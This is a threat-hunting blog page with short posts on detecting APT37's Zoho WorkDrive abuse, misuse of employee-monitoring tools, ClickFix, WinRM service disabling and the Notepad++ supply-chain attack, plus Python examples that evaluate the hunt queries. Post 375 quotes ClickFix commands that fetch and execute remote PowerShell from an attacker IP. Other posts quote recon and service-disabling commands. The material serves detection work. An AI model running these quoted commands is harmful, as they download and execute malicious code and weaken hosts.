Posts

378. Hunting for APT37: Zoho WorkDrive Abuse

Hello everyone! Today we’ll talk about another legitimate service that attackers abuse - in this case, APT37. And of course, we’ll look at how to use this information for proactive threat hunting.

So, in one of APT37’s fairly recent campaigns (we track this cluster as Squid Werewolf), they used the RESTLEAF implant, which abused Zoho WorkDrive - a cloud-based file management and collaboration platform.

From a proactive hunting perspective, we can identify all network communications related to Zoho WorkDrive and then separate out the legitimate events:

event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com"

See you soon!

377. Adversaries Continue to Add Employee Monitoring Tools to Their Arsenal

Hello everyone! It seems the trend is indeed being confirmed: another legitimate employee monitoring tool has ended up in the arsenal of attackers. Malwarebytes reported on a campaign in which attackers disguise Teramind installers as Zoom and Google Meet updates.

Teramind is a software platform for employee monitoring and workplace activity analysis. It helps companies track and analyze user actions on computers and across networks to improve security, productivity, and compliance with corporate policies. However, attackers can use such software for unauthorized access to corporate systems.

First, we can look for events related to the execution of files signed by Teramind Inc., for example:

event_type: "processcreatewin" AND proc_file_sig: "teramind"

You can also check for suspicious communications with teramind[.]co:

event_type: "dnsreqwin" AND dns_rname: "teramind.co"

See you soon!

376. Another Employee Monitoring Tool is Being Used by Attackers

Hello everyone! I think we’re all used to attackers abusing remote administration tools, but it seems a new trend is emerging - the abuse of employee monitoring tools. We’ve already seen attackers use Controlio and Mipko Employee Monitor, and a recent report by Huntress notes that ransomware operators have added yet another similar tool to their arsenal - Network LookOut Net Monitor for Employees.

What should you look for? For example, suspicious interaction with networklookout[.]com:

event_type: "dnsreqwin" AND dns_rname: "networklookout.com"

And, of course, process execution events whose metadata indicates this tool, for example:

event_type: "processcreatewin" AND proc_file_productname: "Net Monitor for Employees Pro"

See you soon!

375. The New ClickFix Variant: Do We Really Need To Detect It?

Hello everyone! Variants of the Malicious Copy and Paste technique (T1204.004) remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities.

This particular variant was shared by researchers from Microsoft Threat Intelligence. The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response:

cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

Despite the originality of the approach, the Name: field contains a fairly ordinary command:

powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex"

As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this:

event_type: "processcreatewin" AND...

374. Hunting for Suspicious Service Stopping Events

Hello everyone! Today we’ll take a look at the Service Stop technique (T1489) and discuss whether it’s worth hunting for its implementation.

This technique is a typical behavioral marker for ransomware and wipers. If you check ATT&CK, you’ll see plenty of examples. Typically, such malware is used at the very end of the cyberattack lifecycle and is hardly a good target for proactive threat hunting. However, there are always exceptions.

Let’s take a look at the Prometei botnet. During the malware installation process, it stops the WinRM service and then disables it:

sc stop WinRM
sc config WinRM start= disabled

Why is this done? For example, it makes remote administration more difficult. Could such activity be legitimate? Of course! So this behavioral marker is a reasonable target for proactive hunting:

event_type: "processcreatewin" AND proc_file_path: "sc.exe" AND cmdline: ("winrm" AND "disabled")

See you soon!

373. Adversaries Keep Abusing Legitimate Cloud Infrastructure, But You Can Hunt For It!

Hello everyone! The abuse of legitimate cloud services keeps appearing in public cyber threat research reports, so today we’ll look at a couple of examples related to both malware distribution and data exfiltration.

The first example is a loader from this report. In this case, the attackers abuse PowerShell to download an image containing malicious code from cloudinary[.]com:

hxxps://res[.]cloudinary[.]com/dbjtzqp4q/image/upload/v1767455040/optimized_MSI_lpsd9p.jpg

Here we can search for suspicious PowerShell interactions with cloudinary[.]com:

event_type: "dnsreqwin" AND dns_rname: "cloudinary.com" AND proc_file_path: "powershell.exe"

Another example is Muddled Libra. The attackers attempted to use several legitimate services for data exfiltration:

upload[.]ee
uploadnow[.]io
filetransfer[.]io
filebin[.]io

Suspicious communications with these services can also be searched for:

event_type: "dnsreq" AN...
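The DNS-request hunts in posts 378, 377, 376 and 373 all have the same shape: find resolutions of a watched domain, optionally restrict the requesting process, then set aside the resolutions your environment legitimately produces. The following Python is an added example that is not code from the blog or from any SIEM vendor. It keeps the page's field names (event_type, dns_rname, proc_file_path) but the sample events, the helper names and the baseline allowlist are constructed for illustration. It goes slightly beyond the page's queries in one respect: it matches domains on label boundaries, so a look-alike such as networklookout.com.something.example does not count as a hit the way a plain substring match would.

```python
# Added example: offline evaluator for the DNS-request hunts in posts 378,
# 377, 376 and 373. Events are constructed, not real telemetry; helper names
# are this example's own.

# Constructed sample telemetry. The sixth record is a deliberate look-alike:
# it contains the string "networklookout.com" but is not that domain.
SAMPLE_EVENTS = [
    {"event_type": "dnsreqwin", "dns_rname": "workdrive.zohoexternal.com",
     "proc_file_path": r"C:\Users\a\AppData\Local\Temp\update.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "workdrive.zohoexternal.com",
     "proc_file_path": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "api.teramind.co",
     "proc_file_path": r"C:\Windows\System32\cmd.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "res.cloudinary.com",
     "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "res.cloudinary.com",
     "proc_file_path": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"event_type": "dnsreqwin", "dns_rname": "networklookout.com.lookalike.example",
     "proc_file_path": r"C:\Windows\System32\svchost.exe"},
    {"event_type": "dnsreq", "dns_rname": "filebin.io",
     "proc_file_path": r"C:\Windows\System32\curl.exe"},
]


def refang(indicator: str) -> str:
    """Turn a defanged domain such as 'teramind[.]co' into 'teramind.co'."""
    return indicator.replace("[.]", ".").strip().lower().rstrip(".")


def domain_matches(qname: str, watched: str) -> bool:
    """Label-boundary match: qname equals the watched domain or is a subdomain
    of it. 'api.teramind.co' matches 'teramind.co'; a plain substring test
    would also match 'teramind.co.example', which this does not."""
    q = qname.strip().lower().rstrip(".")
    w = refang(watched)
    return q == w or q.endswith("." + w)


def basename(path: str) -> str:
    """Lower-case image name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt_dns(events, watched_domains, requesting_process=None, baseline_processes=()):
    """Return DNS-request events toward any watched domain.

    requesting_process: optional image name the request must come from, like
        the proc_file_path: "powershell.exe" clause in the cloudinary query.
    baseline_processes: image names known to contact the service legitimately
        in your environment (e.g. the browser used for Zoho WorkDrive). Their
        events are dropped, which is the 'separate the legitimate events'
        step done mechanically. The allowlist is an assumption to tune.
    """
    baseline = {p.lower() for p in baseline_processes}
    hits = []
    for ev in events:
        if ev.get("event_type") not in ("dnsreqwin", "dnsreq"):
            continue
        if not any(domain_matches(ev.get("dns_rname", ""), d) for d in watched_domains):
            continue
        image = basename(ev.get("proc_file_path", ""))
        if requesting_process and image != requesting_process.lower():
            continue
        if image in baseline:
            continue
        hits.append(ev)
    return hits


def run_page_hunts(events=SAMPLE_EVENTS):
    """The page's five DNS hunts expressed as calls. Returns hunt name -> hits."""
    return {
        "zoho_workdrive": hunt_dns(events, ["workdrive.zohoexternal.com"],
                                   baseline_processes=["chrome.exe"]),
        "teramind": hunt_dns(events, ["teramind[.]co"]),
        "networklookout": hunt_dns(events, ["networklookout[.]com"]),
        "cloudinary_powershell": hunt_dns(events, ["cloudinary[.]com"],
                                          requesting_process="powershell.exe"),
        "muddled_libra_exfil": hunt_dns(events, ["upload[.]ee", "uploadnow[.]io",
                                                 "filetransfer[.]io", "filebin[.]io"]),
    }


if __name__ == "__main__":
    for name, hits in run_page_hunts().items():
        print(f"{name}: {len(hits)} hit(s)")
        for ev in hits:
            print(f"    {ev['dns_rname']} <- {basename(ev['proc_file_path'])}")
```

On the constructed sample, the Zoho hunt returns only the request from the Temp-folder executable (the browser's request is baselined away), the Teramind hunt catches the subdomain, the look-alike domain produces no hit, and the cloudinary hunt keeps only the PowerShell-originated resolution. The baseline list is the part you have to build from your own environment; the page's point is that the query finds all communications and the analyst does the separation.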

372. The Notepad++ Supply Chain Attack: Detection and Hunting Opportunities

Hello everyone! Today we’ll talk about a supply-chain attack related to Notepad++ and look at whether it was possible to detect the artifacts of compromise associated with it. Let’s take a look at the Kaspersky Lab report dedicated to this attack.

The first thing that caught my attention is that, once again, the attackers executed a large number of commands to collect information about the compromised system, for example:

cmd /c whoami >> a.txt
cmd /c tasklist >> a.txt
cmd /c systeminfo >> a.txt
cmd /c netstat -ano >> a.txt

Yes, hunting for these kinds of behavioral markers will generate a lot of “noise,” but if you know your infrastructure well, they can absolutely be worked with:

event_type: "processcreatewin" AND proc_p_file_path: "cmd.exe" AND cmdline: (*whoami* OR *tasklist* OR *systeminfo* OR *netstat*)

Next, the attackers once again abused cURL, and this time they also used a rather suspicious web service - temp[.]sh:

curl.exe -F ...
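The two process-creation hunts on this page, sc.exe disabling WinRM in post 374 and recon commands spawned by cmd.exe in post 372, are shown below as an added Python example that is not code from the blog. Field names follow the page's queries (event_type, proc_file_path, proc_p_file_path, cmdline); the host and ts fields, the sample events, the time window and the distinct-tool threshold are all constructed assumptions. The second hunt adds one thing the page's query does not have: it groups the recon commands per host and parent image and only raises when several different recon tools run within a short window, which is one practical way to handle the "noise" the post mentions.

```python
# Added example: offline evaluator for the process-creation hunts in posts
# 374 (sc.exe disabling WinRM) and 372 (recon commands spawned by cmd.exe).
# Events are constructed; thresholds are assumptions to tune in your environment.
from collections import defaultdict


def _ws02_recon(i, cmd):
    """Build one constructed recon event for host ws02 (helper for the sample)."""
    return {"ts": 200 + 5 * i, "host": "ws02", "event_type": "processcreatewin",
            "proc_file_path": "C:\\Windows\\System32\\" + cmd.split()[0] + ".exe",
            "proc_p_file_path": r"C:\Windows\System32\cmd.exe", "cmdline": cmd}


SAMPLE_EVENTS = [
    # ws01: the Prometei-style sequence from post 374, then an unrelated sc call
    {"ts": 100, "host": "ws01", "event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\sc.exe",
     "proc_p_file_path": r"C:\Users\a\AppData\Local\Temp\svc.exe",
     "cmdline": "sc stop WinRM"},
    {"ts": 101, "host": "ws01", "event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\sc.exe",
     "proc_p_file_path": r"C:\Users\a\AppData\Local\Temp\svc.exe",
     "cmdline": "sc config WinRM start= disabled"},
    {"ts": 102, "host": "ws01", "event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\sc.exe",
     "proc_p_file_path": r"C:\Windows\System32\cmd.exe",
     "cmdline": "sc config Spooler start= disabled"},
    # ws02: a burst of recon commands, each spawned by cmd.exe (post 372)
    *[_ws02_recon(i, cmd) for i, cmd in
      enumerate(["whoami", "tasklist", "systeminfo", "netstat -ano"])],
    # ws03: an admin running a single whoami, which should not fire on its own
    {"ts": 300, "host": "ws03", "event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\whoami.exe",
     "proc_p_file_path": r"C:\Windows\System32\cmd.exe", "cmdline": "whoami"},
]

RECON_TERMS = ("whoami", "tasklist", "systeminfo", "netstat")


def basename(path):
    """Lower-case image name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def cmdline_has(cmdline, all_of=(), any_of=()):
    """Case-insensitive substring match, the same semantics as the page's
    cmdline: ("winrm" AND "disabled") and cmdline: (*whoami* OR ...) clauses."""
    c = cmdline.lower()
    return all(t in c for t in all_of) and (not any_of or any(t in c for t in any_of))


def hunt_service_disable(events, service="winrm"):
    """Post 374's query: sc.exe whose cmdline names the service and 'disabled'.
    'sc stop WinRM' alone is not returned, exactly as in the page's query."""
    return [ev for ev in events
            if ev.get("event_type") == "processcreatewin"
            and basename(ev.get("proc_file_path", "")) == "sc.exe"
            and cmdline_has(ev.get("cmdline", ""), all_of=(service.lower(), "disabled"))]


def hunt_recon_bursts(events, parent="cmd.exe", window=60, min_distinct=3):
    """Post 372's query with aggregation on top: collect recon commands whose
    parent image is cmd.exe, group them per (host, parent path) and alert only
    when at least min_distinct different recon tools appear within `window`
    seconds. A lone whoami from an admin therefore does not fire."""
    groups = defaultdict(list)
    for ev in events:
        if ev.get("event_type") != "processcreatewin":
            continue
        if basename(ev.get("proc_p_file_path", "")) != parent:
            continue
        tools = [t for t in RECON_TERMS if t in ev.get("cmdline", "").lower()]
        if tools:
            groups[(ev["host"], ev["proc_p_file_path"])].append((ev["ts"], tools[0]))
    alerts = []
    for (host, parent_path), seq in groups.items():
        seq.sort()
        for ts, _ in seq:
            seen = {tool for t, tool in seq if ts <= t <= ts + window}
            if len(seen) >= min_distinct:
                alerts.append({"host": host, "parent": parent_path,
                               "first_ts": ts, "tools": sorted(seen)})
                break  # one alert per host/parent is enough
    return alerts


if __name__ == "__main__":
    for ev in hunt_service_disable(SAMPLE_EVENTS):
        print(f"service disable on {ev['host']}: {ev['cmdline']}")
    for a in hunt_recon_bursts(SAMPLE_EVENTS):
        print(f"recon burst on {a['host']} from {a['parent']}: {', '.join(a['tools'])}")
```

Against the constructed sample, the first hunt returns only the sc config WinRM start= disabled event (the Spooler change does not mention WinRM, and sc stop WinRM lacks the word disabled, matching the page's query), and the second raises a single alert for ws02, where four distinct recon tools ran within 15 seconds, while the lone whoami on ws03 stays quiet. Raising min_distinct or shrinking window trades recall for noise, which is the tuning the post has in mind when it says you need to know your infrastructure.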